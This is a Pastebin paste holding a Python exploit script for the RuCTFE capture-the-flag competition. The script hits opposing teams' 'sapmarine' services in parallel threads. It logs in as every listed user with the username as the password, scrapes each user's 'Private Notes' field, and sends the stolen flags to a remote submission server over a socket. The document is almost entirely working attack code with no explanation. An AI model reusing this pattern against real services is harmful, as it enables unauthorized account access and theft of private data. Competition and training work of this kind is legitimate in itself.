Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import threading
- import socket
- import requests
- from lxml import html
- from bs4 import BeautifulSoup
- task = 'http://sapmarine.'
- suf = 'team'
- pref = '.ructfe.org'
- loginForm = '/loginForm'
- profileForm = '/profileForm'
- def get_html(url):
- return requests.get(url).content
- def get_user_list(url):
- soup = BeautifulSoup(get_html(url), 'lxml')
- users = []
- try:
- for user in soup.find_all('table')[1].find_all('tr'):
- users.append(str(list(user)[1])[4:-5])
- return users[1:]
- except IndexError:
- return []
- def get_flag(html):
- soup = BeautifulSoup(html, 'lxml')
- form = soup.find('form')
- try:
- for line in form.find_all('div'):
- fr = line.find('input')
- if fr['placeholder'] == 'Private Notes':
- return fr['value']
- except AttributeError:
- pass
- def perform(user, url_login, url_get):
- req = requests.session()
- req.get(url_login + '?user={}&pass={}'.format(user, user))
- resp = req.get(url_get)
- return get_flag(resp.content)
- def logout(url):
- return requests.get(url)
- def get_users():
- return [4, 27, 3, 28, 121, 305, 52, 309, 45, 53, 47, 7, 257, 61, 37, 9, 1, 65, 192, 30, 248, 63, 423, 126, 259, 84, 338, 5, 24, 40, 115, 94, 88, 46, 363, 64, 36, 198, 444, 245, 101, 10, 174, 258, 137, 127, 320, 370, 15, 2, 139, 390, 410, 314, 11, 261, 69, 353, 159, 59, 404, 424, 277, 230, 201, 269, 80, 141, 260, 155, 176, 54, 145, 436, 346, 400, 374, 307, 143, 222, 8, 254, 382, 319, 432, 396, 347, 313, 225, 79, 134, 208, 49, 394, 83, 38, 118, 224, 349, 271, 169, 107, 187, 263, 227, 434, 73, 373, 68, 323, 78, 162, 297, 142, 250, 56, 380, 20, 86, 203, 62, 22, 325, 411, 185, 300, 152, 210, 102, 146, 33, 275, 283, 35, 82, 171, 74, 60, 318, 345, 438, 270, 239, 96, 202, 77, 212, 322, 321, 392, 417, 249, 443, 393, 364, 451, 426, 129, 218, 119, 301, 399, 372, 371, 369, 368, 367, 366, 365, 362, 361, 360, 359, 358, 357, 356, 355, 354, 352, 351, 350, 348, 344, 343, 342, 341, 340, 339, 337, 336, 335, 334, 333, 332, 331, 330, 329, 328, 327, 326, 324, 317, 316, 315, 312, 311, 310, 308, 306, 304, 303, 302, 299, 298, 296, 295, 294, 293, 292, 291, 290, 289, 288, 287, 286, 268, 284, 282, 281, 280, 279, 278, 276, 274, 273, 272, 50, 48, 44, 43, 42, 41, 39, 34, 32, 31, 29, 26, 25, 23, 21, 19, 18, 17, 16, 14, 13, 12, 6, 395, 450, 449, 448, 447, 446, 445, 442, 441, 440, 439, 437, 435, 433, 431, 430, 429, 428, 427, 425, 422, 421, 420, 419, 418, 416, 415, 414, 413, 412, 285, 267, 266, 265, 264, 262, 256, 255, 253, 252, 251, 247, 246, 244, 243, 242, 241, 240, 238, 237, 236, 235, 234, 233, 232, 231, 229, 228, 226, 223, 221, 220, 219, 217, 216, 215, 214, 213, 211, 209, 207, 206, 205, 204, 200, 199, 197, 196, 195, 194, 193, 191, 190, 189, 188, 186, 184, 183, 182, 181, 180, 179, 178, 177, 175, 173, 172, 170, 168, 167, 166, 165, 164, 163, 161, 160, 158, 157, 156, 154, 153, 151, 150, 149, 148, 147, 144, 140, 138, 136, 135, 133, 132, 131, 130, 128, 125, 124, 123, 122, 120, 117, 116, 114, 113, 112, 111, 110, 109, 108, 106, 105, 104, 103, 100, 99, 98, 97, 95, 93, 92, 91, 90, 89, 87, 85, 81, 76, 75, 72, 71, 70, 67, 66, 58, 57, 55, 51, 409, 408, 407, 406, 405, 403, 402, 401, 398, 397, 391, 389, 388, 387, 386, 385, 384, 383, 381, 379, 378, 377, 376, 375]
- def hack(num):
- if num == 11:
- return
- url = task + suf + str(num) + pref
- while True:
- try:
- users = get_user_list(url)
- except requests.exceptions.ConnectionError:
- users = []
- for user in users:
- flag = perform(user, url + '/login', url + profileForm)
- if flag != '' and flag is not None:
- print('Command number: {}; User: {}; Flag: {}'.format(num, user, flag))
- print(user)
- print(flag)
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect(('flags.ructfe.org', 31337))
- print(sock.recv(200))
- sock.send((flag + '\n').encode('utf8'))
- print(sock.recv(200))
- print()
- if __name__ == '__main__':
- for num in get_users()[30:60]:
- threading.Thread(target=hack, args=(num,)).start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement